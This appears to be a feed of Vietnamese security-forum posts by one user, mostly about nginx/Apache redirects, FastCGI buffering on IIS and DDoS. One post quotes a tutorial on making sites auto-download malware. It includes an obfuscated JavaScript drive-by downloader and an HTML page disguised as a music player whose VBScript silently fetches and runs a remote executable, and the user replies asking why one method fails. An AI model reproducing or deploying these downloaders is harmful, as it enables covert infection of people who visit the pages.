<![CDATA[Messages posted by "LlyKil"]]> /hvaonline/posts/listByUser/159230.html JForum - http://www.jforum.net HVA bảo mật như thế nào? /hvaonline/posts/preList/43059/269288.html#269288 /hvaonline/posts/preList/43059/269288.html#269288 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/preList/39641/244453.html#244453 /hvaonline/posts/preList/39641/244453.html#244453 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/preList/39641/244016.html#244016 /hvaonline/posts/preList/39641/244016.html#244016 GMT Apache HTTP DoS

Monkey.D.Luffy wrote:
Hi, giúp em vấn đề này với. Em đã setup nginx và chạy thành công nhưng bị lỗi này. File config em như sau: -nginx listen ở port 80 -apache listen ở port 8000 -forum em chạy vbb Em vẫn chạy forum được với path http://site/forum/index.php nhưng có những script ví dụ như login, newpost nó lại bị wwwect về http://site:8000/forum/xxx.php? thế là ko thể connect được, muốn connect thì phải bỏ :8000 ở path, em muốn hỏi là làm sao để khắc phục tình trạng này? Thân.  
Bạn có thể giải thích rõ chổ này giúp mình được không?]]>
/hvaonline/posts/preList/29851/224401.html#224401 /hvaonline/posts/preList/29851/224401.html#224401 GMT
CGI, FCGI & ISAPI ResponseBufferLimit=0 vào file config của FCGI :D Cảm ơn mọi người đã quan tâm nhé.]]> /hvaonline/posts/preList/35448/219417.html#219417 /hvaonline/posts/preList/35448/219417.html#219417 GMT CGI, FCGI & ISAPI

nbthanh wrote:

LlyKil wrote:
Thực ra vấn đề này hơi khó giải thích vì đây chỉ là chi tiết nhỏ trong cách "trả lời" request. Cụ thể thì mình đã mô tả như trên. Tuy không ảnh hưởng gì đến quá trình xử lý hay trả kết quả từ webserver về nhưng mình cũng muốn tìm hiểu. Mình chỉ thắc mắc là vì sao nếu chuyển sang CGI hay ISAPI thì không như vậy. Có lẽ đây là đặc tính/kiểu riêng của FCGI. Cảm ơn conmale đã reply cho thread này. 
Lý do nó là vì server không hơi đâu mà trả về client từng byte data mà nó phải có 1 buffer để lưu lại output từ script, khi đầy buffer nó trả về 1 lần luôn thì hiệu xuất sẽ tốt hơn nhiều so với việc cứ có byte nào thì trả về byte đó. Thông thường thì với CGI, server nó giao lại hết execution cho CGI nên gần như CGI script có data gì là server nó trả lại cho client ngay nên bạn thấy data nó ra từ từ. ISAPI thì tôi không rõ lắm, nhưng FCGI thì mặc định nó đã có cái output buffer rồi nên nó sẽ không trả về client từ byte đâu mà đợi đầy buffer (hoặc script kết thúc) nó mới trả về luôn 1 lần. Mà nhìn qua thì có vẻ như server của bạn là Win, chạy IIS? Nếu không có nhu cầu chạy ASP/.NET mà chỉ chạy PHP thôi thì sao không sử dụng Apache? 
Trước tiên mình cảm ơn bạn đã giải đáp giúp thắc mắc. *Ở trên mình đã nói mình sử dụng server Win và chạy Plesk (Plesk sử dụng IIS). Vì mình đã lỡ install Plesk nên giờ lại lười unsinstall để làm lại. Thế còn FCGI mình có thể set buffer để nó trả kết quả xử lý về từ từ được chứ?]]>
/hvaonline/posts/preList/35448/219414.html#219414 /hvaonline/posts/preList/35448/219414.html#219414 GMT
CGI, FCGI & ISAPI /hvaonline/posts/preList/35448/219407.html#219407 /hvaonline/posts/preList/35448/219407.html#219407 GMT CGI, FCGI & ISAPI /hvaonline/posts/preList/35448/219384.html#219384 /hvaonline/posts/preList/35448/219384.html#219384 GMT CGI, FCGI & ISAPI /hvaonline/posts/preList/35448/218381.html#218381 /hvaonline/posts/preList/35448/218381.html#218381 GMT CGI, FCGI & ISAPI /hvaonline/posts/preList/35448/218297.html#218297 /hvaonline/posts/preList/35448/218297.html#218297 GMT CGI, FCGI & ISAPI /hvaonline/posts/preList/35448/218178.html#218178 /hvaonline/posts/preList/35448/218178.html#218178 GMT Re: PhimNguoiLon.EXE /hvaonline/posts/preList/22872/136432.html#136432 /hvaonline/posts/preList/22872/136432.html#136432 GMT Hỏi về Bug mới ??? /hvaonline/posts/preList/19733/117352.html#117352 /hvaonline/posts/preList/19733/117352.html#117352 GMT Re: tự động download 1 file khi vào web

lion_king_lovely_1985 wrote:
Cách 1: Sử dụng phương thức IFrame chèn vào site tự rect link tới 1 site có chèn code tự động download virus: <iframe src=http://www.webcuaban.com/pagecovirus.htm width=0 height=0></iframe> Hoặc là một thẻ meta cho phép wwwect đến một site khác. Các site link vào tất cả đều là link virus. Tại thời điểm đó còn rất nhiều trình duyệt bị lỗi và chưa kịp update, ngay cả Firefox cũng dính. Khi người dùng internet vào các trang web đã bị thêm dòng như trên thì nó sẽ tự động download virus về máy mà không hề hay biết hoặc nó sẽ hiện ra 1 cái của sổ và bạn cứ thế bấm vào nút đồng ý. Vậy là máy tính bị dính virus. Ví dụ cái link trên có đoạn code download con virus : Code:
function Go(a) {
var s = myCreateOB(a, "WS"+"cr"+"ipt.S"+"he"+"ll");
var o = myCreateOB(a, "AD"+"OD"+"B.St"+"ream");
var e = s.Environment("Process");

var xml = null;
var url = 'http://www.webcuaban.com/Virus.exe';
var bin = e.Item("TEMP") + "svchosts.exe";
var dat;

try { xml=new XMLHttpRequest(); }
catch(e) {
try { xml = new ActiveXObject("Mic"+"ros"+"of"+"t.XM"+"LHTTP"); }
catch(e) {
xml = new ActiveXObject("MSX"+"ML2.Ser"+"verXM"+"LHT"+"TP");
}
}

if (! xml) return(0);

xml.open("GET", url, false)
xml.send(null);
dat = xml.responseBody;

o.Type = 1;
o.Mode = 3;
o.Open();
o.Write(dat);
o.SaveToFile(bin, 2);

s.Run(bin,0);
}
Con virus có link url = 'http://www.webcuaban.com/Virus.exe'; sẽ được lưu xuống máy nạn nhân với tên svchosts.exe Các con virus này thậm trí có khả năng lây qua USB, nên nó nhân bản ra khá nhanh. Cách 2: Gần đây có nhiều con virus viết bằng autoIT3 như là: http://www.webcuaban.com/YMBEST/ http://viet8x.evonet.ro Download tại đây : http://www.autoitscript.com/autoit3/ (Không khuyến cáo các bạn dùng thử). Tuy nhiên sài được thì rất Kool, có thể giả lập các phím bấm, các nút truột thậm trí giao diện không thua gì soft code bằng các language như C, C++, C#....... Code:
<html>

<head>

<meta http-equiv="Content-Language" content="en-us">

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<meta name="description" content="Audition">

<title>Nghe nhạc Audition | Hyo Ri Lee - 10 Minutes!</title>

</head>



<body bgcolor=black>

<script language="VBScript">

on error resume next

dl = "http://www.webcuaban.com/guitangban.exe"

Set df = document.createElement("object")

df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"

str="Microsoft.XMLHTTP"

Set x = df.CreateObject(str,"")

a1="Ado"

a2="db."

a3="Str"

a4="eam"

str1=a1&a2&a3&a4

str5=str1

set S = df.createobject(str5,"")

S.type = 1

str6="GET"

x.Open str6, dl, False

x.Send

fname1="svchost32.exe"

set F = df.createobject("Scripting.FileSystemObject","")

set tmp = F.GetSpecialFolder(2)

fname1= F.BuildPath(tmp,fname1)

S.open

S.write x.responseBody

S.savetofile fname1,2

S.close

set Q = df.createobject("Shell.Application","")

Q.ShellExecute fname1,"","","open",0

</script>


<div align = center>

<h2><font color=#FFFFFF>Các bạn đang nghe bài Hyo Ri Lee - 10 Minutes</font></h2>

<embed src="http://ladymoonlight.org/Hyo Ri Lee - 10 Minutes.mp3" autostart="true" >

</div>

<!-- Start of StatCounter Code -->

<script type="text/javascript" language="javascript">

var sc_project=1874708;

var sc_invisible=1;

var sc_partition=17;

var sc_security="ae164a82";

var sc_remove_link=1;

</script>

<script type="text/javascript" language="javascript" src="http://www.statcounter.com/counter/counter.js"></script><noscript><img src="http://c18.statcounter.com/counter.php?sc_project=1874708&java=0&security=ae164a82&invisible=1" alt="unique visitor counter" border="0"> </noscript>

<!-- End of StatCounter Code -->

</body>

</html>
© by: LKL!!! Không khuyến khích sử dụng với mục đích ko lành mạnh! Không chịu trách nhiệm dưới mọi hình thức áp dụng!!! Thân LKL!!! Xin lỗi BQT nếu thấy bài này có vấn đề ko hay cho định hướng của HVA thì làm ơn Move To Trash giúp LKL!!! Thân mến!!! 
Sao cái cách 1 xài không đc, đã test với IE 6 và FF 2.6. Khi chạy thì nó ra nguyên code luôn. Hay là bỏ vào thẻ nào nữa ? ]]>
/hvaonline/posts/preList/19079/117346.html#117346 /hvaonline/posts/preList/19079/117346.html#117346 GMT
Re: Anti DDoS ???

mR.Bi wrote:
Riêng tôi thấy cách chống DDoS của HVA thì thực sự có hiệu quả và có thể cho tôi biết làm như thế nào ? 
Mình thì ko có kiến thức để bàn vấn đề của bạn trên kia :) , nhưng thú thật đọc câu này mình rất ư là buồn cười :D DOS thì đâu cần phải có user và password thì phải :D DOS mà cứ ngồi đánh F5, enter với click thì kẻ tấn công phải rảnh lắm đây!  
Chắc bạn chưa biết về XFlash DDoS rồi]]>
/hvaonline/posts/preList/19565/116506.html#116506 /hvaonline/posts/preList/19565/116506.html#116506 GMT
Anti DDoS ??? /hvaonline/posts/preList/19565/116503.html#116503 /hvaonline/posts/preList/19565/116503.html#116503 GMT